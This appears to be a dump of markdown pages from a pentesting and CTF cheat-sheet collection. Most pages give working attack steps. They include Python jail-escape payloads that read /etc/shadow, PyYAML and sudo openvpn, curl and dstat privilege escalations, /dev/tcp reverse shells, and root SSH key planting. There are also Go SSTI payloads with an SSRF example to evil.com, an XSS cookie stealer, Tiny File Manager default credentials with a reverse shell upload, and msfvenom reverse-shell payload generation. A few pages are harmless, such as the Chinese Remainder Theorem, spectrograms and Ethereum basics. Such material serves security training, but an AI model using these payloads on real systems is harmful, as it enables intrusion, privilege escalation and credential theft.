3 | If we faced the Python script as follow, we cannot use common modules used for escalating privileges (**"os", "system", etc.**). 4 | It appeared in **Newbie CTF 2019**. 5 | 6 | ```python 7 | #! /usr/bin/python3 8 | def main(): 9 | text = input('>> ') 10 | for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']: 11 | if keyword in text: 12 | print("No!!!") 13 | return 14 | else: 15 | exec(text) 16 | 17 | if __name__ == "__main__": 18 | main() 19 | ``` 20 | 21 | We need to modify module names to allow us to execute them. 22 | [This post](https://dspyt.com/how-to-python-jail-escape-newbie-ctf-2019) explains in details. 23 | 24 | ## Payloads 25 | 26 | ```python 27 | print(globals()) 28 | print(getattr(getattr(globals()['__builtins__'], '__im'+'port__')('o'+'s'), 'sys'+'tem')('cat /etc/shadow')) 29 | __builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /etc/shadow') 30 | ``` 31 | 32 | ## Payloads (input) 33 | 34 | If the **"eval"** or **"exec"** modules are accepted, we can input arbitrary code. 35 | 36 | ```python 37 | eval(input()) 38 | # or 39 | exec(input()) 40 | 41 | > print(open("/etc/passwd", "r").read()) 42 | ``` 43 | 44 | ## References 45 | 46 | - [DSPYT](https://dspyt.com/how-to-python-jail-escape-newbie-ctf-2019) 47 | -------------------------------------------------------------------------------- /docs/exploit/audio/spectrogram.md: -------------------------------------------------------------------------------- 1 | # Spectrogram 2 | 3 | A spectrogram is a visual representation of the spectrum of frequencies of a signal as it varies with time. 4 | 5 | ## Online Tools 6 | 7 | - **[Spectrum Analyzer](https://academo.org/demos/spectrum-analyzer/)** 8 | 9 | Display a spectrum of signal amplitudes on different frequencies. 10 | Upload audio file like .wav or .mp3, .ogg. 11 | 12 | - **[Spectral Analyzer](https://www.dcode.fr/spectral-analysis)** 13 | 14 | - **[Morse Code Adaptive Audio Decoder](https://morsecode.world/international/decoder/audio-decoder-adaptive.html)** 15 | 16 |
17 | 18 | ## Using Audacity 19 | 20 | Audacity is an audio editor which also can be used for decoding signals in audio files. 21 | 22 | 1. Open an audio file in Audacity. 23 | 2. Click the name of the file at left menu (which contains the reverse triangle icon). 24 | 3. In the drop-down menu, check **Spectrogram**. 25 | 4. If you want to edit advanced settings, click **Spectrogram Settings** in the menu and edit values. 26 | 5. Click **Play** button. 27 | 28 |
29 | 30 | ## Using Inspectrum 31 | 32 | [Inspectrum](https://github.com/miek/inspectrum) is a radio signal analyzer for **.cf32**, **.cf64**, etc. 33 | 34 |
35 | 36 | ## Using Rtl-433 37 | 38 | [rtl-433](https://github.com/merbanan/rtl_433) decodes radio transmissions from devices on the ISM bands. 39 | 40 | ```bash 41 | # -A: Pulse analyzer. 42 | rtl_433 -A 43 | ``` -------------------------------------------------------------------------------- /docs/exploit/blockchain/ethereum/python.md: -------------------------------------------------------------------------------- 1 | # Interact with Ethereum using Python 2 | 3 | ## Preparation 4 | 5 | To use **“py-solc”**, the Ethereum and Solidity are required in our system. So if you don’t have them yet, install them. 6 | 7 | ```python 8 | sudo add-apt-repository ppa:ethereum/ethereum 9 | sudo apt-get update 10 | sudo apt-get install solc 11 | ``` 12 | 13 |
14 | 15 | ## Install Python Packages 16 | 17 | ```bash 18 | pip3 install py-solc 19 | pip3 install web3 20 | ``` 21 | 22 |
23 | 24 | ## Compile Contract 25 | 26 | ```python 27 | import solc 28 | 29 | with open('MyContract.sol', 'r') as f: 30 | contract_source_code = f.read() 31 | 32 | compiled_sol = solc.compile_source(contract_source_code) 33 | 34 | contract_bytecode = compiled_sol[':MyContract']['bin'] 35 | contract_abi = compiled_sol[':MyContract']['abi'] 36 | ``` 37 | 38 |
39 | 40 | ## Interact with Ethereum Chain 41 | 42 | Create the Python script using web3 to interact with blockchain. 43 | 44 | ```python 45 | from web3 import Web3 46 | 47 | rpc_url = "http://10.0.0.1:8545" 48 | private_key = "0x1234..." 49 | addr = "0x1234..." 50 | contract_addr = "0x1234..." 51 | 52 | # Connect 53 | w3 = Web3(Web3.HTTPProvider(rpc_url)) 54 | print(w3.is_connected()) 55 | 56 | # Get the latest block 57 | print(w3.get_block('latest')) 58 | 59 | # Get the balance of specified address 60 | balance = w3.eth.get_balance(addr) 61 | print(f"Balance is {balance}") 62 | ``` -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/python-yaml.md: -------------------------------------------------------------------------------- 1 | # Python Yaml Privilege Escalation 2 | 3 | Python Yaml package is vulnerable to execute arbitrary command. 4 | 5 | ## Investigation 6 | 7 | ```python 8 | import yaml 9 | 10 | filename = "example.yml" 11 | yaml.load() 12 | ``` 13 | 14 | ## Payloads 15 | 16 | ```python 17 | import yaml 18 | from yaml import Loader, UnsafeLoader 19 | 20 | data = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]' 21 | yaml.load(data) 22 | yaml.load(data, Loader=Loader) 23 | yaml.load(data, Loader=UnsafeLoader) 24 | yaml.load_all(data) 25 | yaml.load_all(data, Loader=Loader) 26 | yaml.load_all(data, Loader=UnsafeLoader) 27 | yaml.unsafe_load(data) 28 | ``` 29 | 30 | Now execute the **`bash`** in privilege mode. 31 | 32 | ```bash 33 | /tmp/bash -p 34 | ``` 35 | 36 | ### Reverse Shell 37 | 38 | Start a listener in local machine. 39 | 40 | ```bash 41 | nc -lvnp 1234 42 | ``` 43 | 44 | Then execute Python script that contains the following `YAML` code as root. 45 | 46 | ```python 47 | import yaml 48 | yaml.load('!!python/object/new:os.system ['bash -c "bash -i >& /dev/tcp/10.0.0.1/1234 0>&1"']) 49 | ``` 50 | 51 | ### Base64 Encoding 52 | 53 | Sometimes we might be able to remote code execution by using Base64 encoded payload. 54 | 55 | ```python 56 | yaml.load(b64decode(b"ISFweXRa...YXNoIl0=")) 57 | ``` 58 | 59 | ## References 60 | 61 | - [pyyaml](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation) -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/openvpn.md: -------------------------------------------------------------------------------- 1 | # Sudo OpenVPN Privilege Escalation 2 | 3 | The `sudo openvpn` command might be vulnerable to privilege escalation. 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | (root) /usr/sbin/openvpn /opt/example.ovpn 9 | ``` 10 | 11 | If we can execute **`openvpn`** command as root and we have a **permission of editing** the **`.ovpn`** file, we can escalate to privilege. 12 | 13 | ## Exploitation 14 | 15 | ### 1. Create a Payload 16 | 17 | First create a shell script to reverse shell. For example, create **`/tmp/shell.sh`**. 18 | Replace **``** with your local ip address. 19 | 20 | ```bash 21 | #!/bin/bash 22 | 23 | bash -i >& /dev/tcp//4444 0>&1 24 | ``` 25 | 26 | Then change the file permission so that root can execute this script. 27 | 28 | ```bash 29 | chmod +x /tmp/shell.sh 30 | ``` 31 | 32 | ### 2. Edit .ovpn File 33 | 34 | Next edit the **`.ovpn`** file. 35 | We need to add **"script-security 2"** and **"`up /tmp/shell.sh`"** into the header. 36 | 37 | ```bash 38 | # /opt/example.ovpn 39 | ... 40 | script-security 2 41 | up /tmp/shell.sh 42 | 43 | 44 | -----BEGIN CERTIFICATE----- 45 | ... 46 | ``` 47 | 48 | ### 3. Reverse Shell 49 | 50 | In local machine, start a listener. 51 | 52 | ```bash 53 | nc -lvnp 4444 54 | ``` 55 | 56 | Now execute `openvpn` command as root. 57 | 58 | ```bash 59 | sudo /usr/sbin/openvpn /opt/example.ovpn 60 | ``` 61 | 62 | This command executes our **`shell.sh`**, so we should get a root shell. -------------------------------------------------------------------------------- /docs/exploit/web/go-ssti.md: -------------------------------------------------------------------------------- 1 | # Go SSTI 2 | 3 | Golang html template is vulnerable to SSTI (Server Side Template Injection). 4 | 5 | ## Investigation 6 | 7 | ```go 8 | import "html/template" 9 | 10 | ... 11 | 12 | template.New("foo").Parse("{{ . }}") 13 | ``` 14 | 15 | If a website uses a web framework written in Golang and uses `html/template` module for parsing a template file or strings, we may inject this template with our custom template file/string. 16 | 17 | ## Exploit 18 | 19 | Assume a web application defines `User` struct, `GetFile` method, and `ExecuteCmd` method. 20 | 21 | ```go 22 | // `main.go` of target website 23 | 24 | type User struct { 25 | Id string 26 | Name string 27 | } 28 | 29 | // Read contents of the file and output it. 30 | func GetFile(filepath string) { 31 | ... 32 | } 33 | 34 | // Execute system command. 35 | func ExecuteCmd(cmd string) { 36 | ... 37 | } 38 | ``` 39 | 40 | ### Payloads 41 | 42 | ```bash 43 | {{ . }} 44 | 45 | # Get the `User` struct values. 46 | {{ .User }} 47 | 48 | # Call the `GetFile` method to LFI. 49 | {{ .GetFile "/etc/passwd" }} 50 | 51 | # Call the `ExecuteCmd` method to RCE. 52 | {{ .ExecuteCmd "whoami" }} 53 | ``` 54 | 55 | Also, if the website parses arbitrary template file, which concludes malicious payload like above, in some way e.g. SSRF(`https://example.com/?file=http://evil.com/template.txt`) 56 | 57 | This file will be parsed by the website and lead SSTI. 58 | 59 | ## References 60 | 61 | - [OnSecurity](https://www.onsecurity.io/blog/go-ssti-method-research/) -------------------------------------------------------------------------------- /docs/exploit/cryptography/math/chinese-remainder-theorem.md: -------------------------------------------------------------------------------- 1 | # Chinese Remainder Theorem 2 | 3 | ## Basic 4 | 5 | If moduli (**`n1`, `n2`, etc.**) are co-primes, the following rules hold: 6 | 7 | ```python 8 | x ≡ a1 mod n1 # means `x % n1 = a1` 9 | x ≡ a2 mod n2 # means `x % n2 = a2` 10 | ... 11 | x ≡ ak mod nk # means `x % nk = ak` 12 | ``` 13 | 14 | In addition, if the values of **`a1`, `a2`, … `ak`** and **`n1`, `n2`, … `nk`** are defined, we can calculate **`x`** by the following approach. 15 | 16 | ```python 17 | # Calculate N 18 | N = n1 * n2 * n3 * ... * nk 19 | 20 | # Calculate Ni (N1, N2, ..., Nk) 21 | N1 = n2 * n3 * n4 ... * nk 22 | N2 = n1 * n3 * n4 ... * nk 23 | N3 = n1 * n2 * n4 ... * nk 24 | ... 25 | Nk = n1 * n2 * n3 ... * n(k-1) 26 | 27 | # Calculate xi (x1, x2, ..., xk) 28 | N1*x1 ≡ 1 (mod n1) # means `N1*x1 % n1 = 1` 29 | N2*x2 ≡ 1 (mod n2) # means `N2*x2 % n2 = 1` 30 | N3*x3 ≡ 1 (mod n3) # means `N3*x3 % n3 = 1` 31 | ... 32 | Nk*xk ≡ 1 (mod nk) # means `Nk*xk % nk = 1` 33 | 34 | # x is sum of each ai*Ni*xi (mod N) 35 | x = a1*N1*x1 + a2*N2*x2 + a3*N3*x3 + ... + ak*Nk*xk (mod N) 36 | ``` 37 | 38 | ## Using crt method in Sympy 39 | 40 | ```python 41 | from sympy.ntheory.modular import crt 42 | 43 | m = [7, 15] 44 | a = [5, 12] 45 | (x, y) = crt(m, a) 46 | # x = 68, y = 77 47 | ``` 48 | 49 | ## References 50 | 51 | - [Wikipedia](https://en.wikipedia.org/wiki/Chinese_remainder_theorem) 52 | - [CryptoHack](https://cryptohack.org/courses/modular/crt1/) 53 | - [YouTube: Maths with Jay](https://www.youtube.com/watch?v=zIFehsBHB8o) -------------------------------------------------------------------------------- /docs/exploit/cloud/azure.md: -------------------------------------------------------------------------------- 1 | # Azure Pentesting 2 | 3 | ## Install Azure CLI 4 | 5 | To pentesting Azure, we need to install Azure CLI on our machine. See https://learn.microsoft.com/en-us/cli/azure/install-azure-cli for details. 6 | 7 | Additionally, the `Az` PowerShell module is useful. 8 | 9 | ```bash 10 | Import-Module -Name Az 11 | ``` 12 | 13 | ## Azure Blob Storage 14 | 15 | Azure Blob Storage stores static files in the URL: `https://.blob.core.windows.net/`. 16 | We can enumerate the target storage by accessing the following URLs in browser: 17 | 18 | ```bash 19 | # Enumerate detailed information for the storage 20 | https://.blob.core.windows.net/?restype=container&comp=list 21 | 22 | # Enumerate directories 23 | https://.blob.core.windows.net/?restype=container&comp=list&delimiter=%2F 24 | 25 | # Enumerate version information 26 | https://.blob.core.windows.net/?restype=container&comp=list&include=versions 27 | # Specify version 28 | https://.blob.core.windows.net//example.txt?versionid=2021-09-20T12:34:56.789Z 29 | ``` 30 | 31 | ## Active Directory 32 | 33 | Resources: [Microsoft Docs](https://learn.microsoft.com/en-us/powershell/module/az.resources/get-azaduser?view=azps-13.0.0) 34 | 35 | ```bash 36 | # Get signin user 37 | Get-AzADUser -SignedIn 38 | 39 | # List users 40 | Get-AzADUser -First 10 -Select 'City' -AppendSelected 41 | ``` 42 | 43 | ## References 44 | 45 | - [PwnedLabs](https://pwnedlabs.io/labs/azure-blob-container-to-initial-access) -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/chrome-remote-debugger.md: -------------------------------------------------------------------------------- 1 | # Chrome Remote Debugger Privilege Escalation 2 | 3 | Chrome Remote Debugger is a tool that debugs web applications. 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | /usr/bin/google-chrome --remote-debugging-port=12345 9 | ``` 10 | 11 | If the target system is running **Google Chrome Debugger** with specific port, we can port forward and may be able to retrieve sensitive data in browser debugging mode. 12 | 13 | ## Exploitation 14 | 15 | ### 1. Port Forwarding 16 | 17 | First off, start port forwarding in local machine. 18 | 19 | ```bash 20 | ssh -L 12345:127.0.0.1:12345 remote-user@example.com 21 | ``` 22 | 23 | ### 2. Configure Network Targets in Chrome 24 | 25 | Assume the chrome debugger is running on port **12345**. 26 | Open Chrome browser and input the following string in URL bar at the top of the window. 27 | 28 | ```bash 29 | chrome://inspect/#devices 30 | ``` 31 | 32 | Then click **“Configure…”** at the right of **“Discover network targets”**. The modal window opens. 33 | In the modal window, enter **“localhost:12345”** then click **“Done”**. 34 | Now we should see the remote host appears at the bottom of the **“Remote Target”**. 35 | Click **“inspect”** then new browser open. We can browse the website. 36 | 37 | ### (Option) Find Credentials 38 | 39 | If the login page found when inspecting, we may see a credential in the developer tool at the right pane. Go to `Network` and click the target page such as `login.php` then go to the `Payload` tab. We can find credentials. -------------------------------------------------------------------------------- /docs/exploit/web/cookie-hijacking.md: -------------------------------------------------------------------------------- 1 | # Cookie Hijacking 2 | 3 | A methodology of manipulating, grabbing cookies. 4 | 5 | ## Cookie Manipulation 6 | 7 | ```html 8 | Cookie: PHPSESSID=0 9 | Cookie: PHPSESSID=1 10 | Cookie: PHPSESSID=999 11 | 12 | 13 | Cookie: PHPSESSID=3836382d61646d696e 14 | ``` 15 | 16 | ## PHP Cookie Grabbing with XSS 17 | 18 | In your local machine, create the payload for grabbing the cookie when the other user will access your machine. 19 | 20 | ```php 21 | // steal_cookie.php 22 | 23 | 24 | ``` 25 | 26 | Create the JavaScript code to force users to access your machine which shows the victim's cookie value. 27 | 28 | ```javascript 29 | 30 | ``` 31 | 32 | POST request with this JavaScript code to the target web page. 33 | Open listner in your local machine and wait for the other users will access the target web page. 34 | 35 | ```sh 36 | nc -lvnp 4444 37 | ``` 38 | 39 | ## Python Cookie Stealer with XSS 40 | 41 | [This script](https://github.com/lnxg33k/misc/blob/master/XSS-cookie-stealer.py) is useful to steal Cookie. 42 | To start web server, execute the Python script as below. 43 | 44 | ```bash 45 | python2 XSS-cookie-stealer.py 46 | ``` 47 | 48 | Then inject our XSS to steal Cookie via our web server. 49 | For instance, 50 | 51 |
52 | 53 | ```html 54 | 55 | ``` 56 | -------------------------------------------------------------------------------- /docs/exploit/web/php-srand-time-guessing.md: -------------------------------------------------------------------------------- 1 | # PHP Srand Time Abusing 2 | 3 | If the website uses “srand(time())” to generate random strings in PHP, we can get the non-random strings by manipulating the attribute of the “srand()” function. 4 | 5 | ## Investigation 6 | 7 | ```php 8 | function generate_random_number() { 9 | srand(time()); 10 | // Some code for generating random number... 11 | return random_numbers; 12 | } 13 | ``` 14 | 15 | For example, assume website uses the above function that generates random numbers or strings to be used for authentications such as activation code, multi-factor security code. 16 | In such cases, we can replace the **“time()”** function with the **“strtotime()”** to make the result to be non-random. 17 | 18 | ## Exploitation 19 | 20 | ### 1. Send Request 21 | 22 | First off, send the request for executing the desired function e.g. **“generate_random_number”** that uses **“srand(time())”**. 23 | See the HTTP response header. 24 | 25 | ```html 26 | Date: Thu, 09 Mar 2023 08:31:35 GMT 27 | ``` 28 | 29 | We can get the time such as **“08:31:35”** so copy this. 30 | 31 | ### 2. Generate Non-Random Result 32 | 33 | We can insert the above Date time as the attribute of **“strtotime()”** function as follow. 34 | 35 | ```php 36 | function generate_random_number() { 37 | srand(strtotime("08:31:35")); 38 | // Some code for generating random number... 39 | echo random_numbers; 40 | } 41 | ``` 42 | 43 | Now execute the above function in PHP playground. 44 | We can get the same result no matter how many times we run it. -------------------------------------------------------------------------------- /docs/exploit/web/tiny-file-manager.md: -------------------------------------------------------------------------------- 1 | # Tiny File Manager 2 | 3 | Tiny File Manager is a simple and small file manager with single php file. 4 | 5 | ## Default Credentials 6 | 7 | ```txt 8 | admin:admin@123 9 | user:12345 10 | ``` 11 | 12 | ## Reverse Shell 13 | 14 | If we can login and access the dashboard of the Tiny File Manager, upload the reverse shell script and get a shell. 15 | First, download the reverse shell script. 16 | 17 | ```sh 18 | wget https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php -O shell.php 19 | ``` 20 | 21 | Update values of **“$ip”** and **“$port”** in the above script to our local ip and port for listener which will start. 22 | Then upload the script to the arbitrary folder in the Tiny File Manager dashboard. 23 | 24 | Now start netcat listener. 25 | 26 | ```sh 27 | nc -lvnp 4444 28 | ``` 29 | 30 | Access the page with the uploaded script. e.g. "http://vulnerable.com/uploads/shell.php". 31 | We should get a target shell. 32 | 33 | ## Remote Code Execution (RCE) Version≤2.4.6 34 | 35 | The payload can be downloaded from [Exploit-DB](https://www.exploit-db.com/exploits/50828) 36 | 37 | ```sh 38 | wget https://www.exploit-db.com/raw/50828 -O exploit.sh 39 | dos2unix exploit.sh 40 | chmod +x exploit.sh 41 | ./exploit.sh http://vulnerable.com/index.php admin "admin@123" 42 | ``` 43 | 44 | If you got the “jq not found” error, install it and run again. 45 | 46 | ```sh 47 | sudo apt install jq 48 | ``` 49 | 50 | ## References 51 | 52 | - [Tiny File Manager](https://github.com/prasathmani/tinyfilemanager) -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/aes-cbc-padding-oracle-attack.md: -------------------------------------------------------------------------------- 1 | # AES-CBC Padding Oracle Attack 2 | 3 | ## Automation 4 | 5 | ### PadBuster 6 | 7 | [PadBuster](https://github.com/AonCyberLabs/PadBuster) is an automated script for performing Padding Oracle attacks. It’s useful to decrypt AES. 8 | 9 | ```sh 10 | # Encrypted Sample -> 2hN2bBPw== 11 | # 16 -> Block site 12 | # -encoding: 0->Base64, 1->Lower Hex, 2->Upper Hex, 3->NET UrlToken, 4->WebSafe Base64 13 | padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw== 16 -encoding 0 14 | 15 | # -bruteforce: Brute force against the first block 16 | padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw== 16 -encoding 0 -bruteforce 17 | 18 | # -cookies: specify cookie value 19 | padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw==" 20 | 21 | # -plaintext: specify plain text 22 | padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw==" -plaintext "user=admin" 23 | ``` 24 | 25 | ### Padre 26 | 27 | [Padre](https://github.com/glebarez/padre) is an advanced exploiter for Padding Oracle attacks against CBC mode encryption. 28 | 29 | ```sh 30 | # Cookie 31 | padre -u 'https://example.com/profile.php' -cookie 'SESS=$' 'ABCD==' 32 | 33 | # Path 34 | padre -u 'https://example.com/profile/$' 'ABCD==' 35 | 36 | # -e: Specify encode type ('b64' or 'lhex') 37 | padre -u 'https://example.com/profile/$' -e lhex '1234abcd...' 38 | 39 | # -err: Error response contents pattern (regex) 40 | padre -u 'https://example.com/profile/$' -err 'Error' 'ABCD==' 41 | ``` -------------------------------------------------------------------------------- /docs/exploit/reconnaissance/subdomain/subdomain-discovery.md: -------------------------------------------------------------------------------- 1 | # Subdomain Discovery 2 | 3 | Finding subdomains is a method of reconnaissance. 4 | 5 | ## Online Tools 6 | 7 | - [Subdomain Finder](https://subdomainfinder.c99.nl/) 8 | - [nmmapper](https://www.nmmapper.com/) 9 | 10 | ## Automation 11 | 12 | Reference: [How to find subdomain takeover using httpx + dig](https://medium.com/@DrakenKun/how-to-find-subdomain-takeover-using-httpx-dig-5c2351d380b4) 13 | 14 | ### Subfinder 15 | 16 | To set API keys, add them to `$HOME/.config/subfinder/provider-config.yaml`. See [the ProjectDiscovery's Documentation](https://docs.projectdiscovery.io/tools/subfinder/install#post-install-configuration) for details. 17 | 18 | ```sh 19 | # -all: Use all sources for enumeration 20 | # -cs: Include all sources in the output 21 | subfinder -d example.com -all -cs > tmp.txt ; cat tmp.txt | cut -d "," -f 1 > domains.txt ; rm tmp.txt 22 | ``` 23 | 24 | ### BBOT 25 | 26 | ```sh 27 | bbot -t example.com -f subdomain-enum 28 | # After enumerating, see the result file at ~/.bbot/scans/xxxx_xxxx/subdomains.txt 29 | ``` 30 | 31 | ## Google Dorks 32 | 33 | Use `site:` parameter on Google search. 34 | 35 | ```sh 36 | site:example.com 37 | site:*.example.com 38 | site:*.*.example.com 39 | 40 | # Subdomains including hyphen ('-') e.g. api-dev.example.com 41 | site:*-*.example.com 42 | 43 | # Exclude 'www' domain 44 | site:*.example.com -site:www.example.com 45 | ``` 46 | 47 | ## Subdomain Takeover 48 | 49 | After enumerating, it’s worth to check the [Subdomain Takever](subdomain-takeover.md). 50 | -------------------------------------------------------------------------------- /docs/exploit/web/php-hash_hmac_bypass.md: -------------------------------------------------------------------------------- 1 | # PHP hash_hmac Bypass 2 | 3 | ## Investigation 4 | 5 | If the website uses **`hash_hmac`** function on PHP as below, we can bypass by injecting parameters. 6 | 7 | ```php 8 | 24 | ``` 25 | 26 | When executing the following command, the **`hash_hmac`** returns **false**. 27 | 28 | ```bash 29 | php -r "echo hash_hmac('sha256', Array(), 'secret')==false;" 30 | 31 | # Output 32 | PHP Warning: hash_hmac() expects parameter 2 to be string, array given in Command line code on line 1 33 | 1 34 | ``` 35 | 36 | ## Exploitation 37 | 38 | Create a **Hmac hash** by running below. 39 | In the above PHP script, **`$hmac`** needs to be the same as the parameter values of **`hmac`**. 40 | 41 | ```bash 42 | php -r "echo hash_hmac('sha256', 'example.com', false)" 43 | 44 | # Output 45 | 8e35e0a8e5a18b6ef04598dff384c65adf5aced1a1d530b17f86e92eeb9372a8 46 | ``` 47 | 48 | So put the output hmac value into the paramter **"hmac"** and the second arguments ("example.com") into the **host** parameter. 49 | 50 | ```bash 51 | https://example.com/?nonce[]=&hmac=8e35e0a8e5a18b6ef04598dff384c65adf5aced1a1d530b17f86e92eeb9372a8&host=example.com 52 | ``` 53 | -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/rpng-guessing.md: -------------------------------------------------------------------------------- 1 | # RPNG (Pseudo Random Number Generator) Guessing 2 | 3 | We may be able to predict numbers from the previous generated numbers because PRNG does not generate truly random numbers. 4 | 5 | ## Investigation 6 | 7 | Suppose that the following RPNG program in Python. The seed, which is used for the random number generator, is generated from the time when the program runs. 8 | 9 | ```python 10 | import random 11 | import time 12 | 13 | seed = int(time.time()) 14 | 15 | random.seed(seed) 16 | 17 | num = random.randint(1, 100) 18 | print("Generated number: ", num) 19 | ``` 20 | 21 | If we can get the seed, we can generate the same number as this program. 22 | 23 | ## Exploitation 24 | 25 | There are several ways to guess the number. Here are some of the examples. 26 | 27 | ### Run Program at the Same Time 28 | 29 | If we can retrieve the program source code, we can run the custom exploit inherited from it, then run it at the same time. 30 | 31 | ### Get the Seed from Target System Time 32 | 33 | If we can know when the program executed in target system, we may be able to calculate the seed from the system time of the target. 34 | We can calculate it in online tools like [Epoch Converter](https://www.epochconverter.com/). 35 | When retrieving the seed, we can put it on the original code as below. 36 | 37 | ```python 38 | # This is the seed which is retrieved from the time generated random numbers. 39 | seed = 1724169824 40 | random.seed(seed) 41 | ``` 42 | 43 | As a result, we can get the same number whenever we run the program. -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/curl.md: -------------------------------------------------------------------------------- 1 | # Sudo Curl Privilege Escalation 2 | 3 | The `sudo curl` command might be vulnerable to privilege escalation (PrivEsc). 4 | 5 | ## Investigation 6 | 7 | ```bash 8 | sudo -l 9 | 10 | (root) /usr/bin/curl 127.0.0.1/* 11 | ``` 12 | 13 | If current user is allowed to execute the command above as root privilege, we can read arbitrary files in the target system or can add our SSH key in the root home directory by abusing the asterisk (`*`). 14 | 15 | I found this setting on **Robots** room on TryHackMe. 16 | 17 | ## Exploit 18 | 19 | ### Option 1. Read Files 20 | 21 | ```bash 22 | sudo /usr/bin/curl 127.0.0.1/ file:///etc/shadow 23 | ``` 24 | 25 | As above, we can read the content of the `/etc/shadow` as root. 26 | 27 | ### Option 2. Add SSH Key 28 | 29 | We can also add our SSH public key to `/root/.ssh/authorized_keys`. 30 | First, generate SSH keys in our local machine: 31 | 32 | ```bash 33 | ssh-keygen -f key 34 | 35 | # Display the content of the public key, and copy it. 36 | cat key.pub 37 | ``` 38 | 39 | Next, in target machine, write the content of this public key: 40 | 41 | ```bash 42 | echo -n '' > /tmp/key.pub 43 | ``` 44 | 45 | Now, we can write this content to `/root/.ssh/authorized_keys` via `curl`: 46 | 47 | ```bash 48 | sudo /usr/bin/curl 127.0.0.1/ -o /tmp/ignore file:///tmp/key.pub -o /root/.ssh/authorized_keys 49 | ``` 50 | 51 | By this, we can login SSH as root, using our private key: 52 | 53 | ```bash 54 | # Run it our local machine 55 | chmod 600 key 56 | ssh root@ -i key 57 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/sha1-hash-collision-attack.md: -------------------------------------------------------------------------------- 1 | # SHA1 Hash Collision Attack 2 | 3 | ## Sample Attacks 4 | 5 | ### 1. Download two Files 6 | 7 | There are several ways to download files. So we can select our desired files as purposes. 8 | 9 | - Download the original two PDF files in [SHAttered](https://shattered.io/). 10 | - Download two custom Files (e.g. messageA and messageB) in [Chosen-Prefix Collision Example](https://sha-mbles.github.io/). 11 | 12 | Check if the SHA1 hash is the same as each other. 13 | 14 | ```bash 15 | sha1sum shattered-1.pdf 16 | sha1sum shattered-2.pdf 17 | 18 | sha1sum messageA 19 | sha1sum messageB 20 | ``` 21 | 22 | ### 2. Host the PDF Files Locally 23 | 24 | In the directory where the two PDF files located, start local server for using in a Python script. 25 | 26 | ```bash 27 | python3 -m http.server 8000 28 | ``` 29 | 30 | ### 3. Create a Python Script 31 | 32 | For example, create a “test.py”. 33 | 34 | ```python 35 | import requests 36 | 37 | file1 = "shattered-1.pdf" 38 | file2 = "shattered-2.pdf" 39 | 40 | pdf_1 = requests.get(f'http://localhost:8000/{file1}') 41 | pdf_2 = requests.get(f'http://localhost:8000/{file2}') 42 | 43 | # e.g. the two values can be used as username/password. 44 | params = {'username': pdf_1.content, 'password': pdf_2.content} 45 | r = requests.get('https://example.com/login', params=params) 46 | print(r.text) 47 | ``` 48 | 49 | ### 4. Run the Script 50 | 51 | ```bash 52 | python3 test.py 53 | ``` 54 | 55 | ## References 56 | 57 | - [Shattered](https://shattered.io/) 58 | - [sha-mbles](https://sha-mbles.github.io/) -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/dstat.md: -------------------------------------------------------------------------------- 1 | # Sudo Dstat Privilege Escalation 2 | 3 | The `sudo dstat` command might be vulnerable to privilege escalation (PrivEsc). 4 | 5 | **dstat** is a versatile tool for generating system resource statistics. 6 | It allows users to create a custom plugin and execute by adding option e.g. **`dstat --myplugin`**. 7 | 8 | ## Investigation 9 | 10 | ```sh 11 | sudo -l 12 | 13 | (ALL) NOPASSWD: /usr/bin/dstat 14 | ``` 15 | 16 | If we can execute **"dstat"** command as root, we can gain access to privileges by using our malicious plugin. 17 | 18 | ## Exploitation 19 | 20 | ### 1. Create a New Dstat Plugin 21 | 22 | First off, find locate the **"dstat"** directory. 23 | 24 | ```sh 25 | find / -type d -name dstat 2>/dev/null 26 | ``` 27 | 28 | Assume the location of dstat is **“/usr/local/share/dstat”**. 29 | Create a plugin called **"dstat_exploit.py"** under **"/usr/local/share/dstat/"**. 30 | 31 | ```sh 32 | import os 33 | 34 | os.system('chmod +s /usr/bin/bash') 35 | ``` 36 | 37 | dstat recognizes plugins under **"/usr/local/share/dstat/"**. 38 | Check if the above exploit plugin has been added by executing the following command. 39 | 40 | ```sh 41 | dstat --list | grep exploit 42 | ``` 43 | 44 | ### 2. Execute Dstat with the Malicious Plugin 45 | 46 | Now execute **"dstat"** with **“—exploit”** flag (the flag name is determined by the suffix of the file name e.g. **"dstat_\.py"**). 47 | 48 | ```sh 49 | sudo /usr/bin/dstat --exploit 50 | ``` 51 | 52 | The exploit plugin executed so we enter bash as root. 53 | 54 | ```sh 55 | bash -p 56 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/shell/reverse-shell-using-metasploit.md: -------------------------------------------------------------------------------- 1 | # Reverse Shell using Metasploit 2 | 3 | We can create a reverse shell payload using Msfvenom and listen for reverse connection with Msfconsole. 4 | 5 | ## Generate Reverse Shell Payload 6 | 7 | ### 1. Create a Payload using MsfVenom 8 | 9 | ```bash 10 | # Linux 11 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf 12 | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf 13 | 14 | # Windows 15 | msfvenom -p windows/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe 16 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 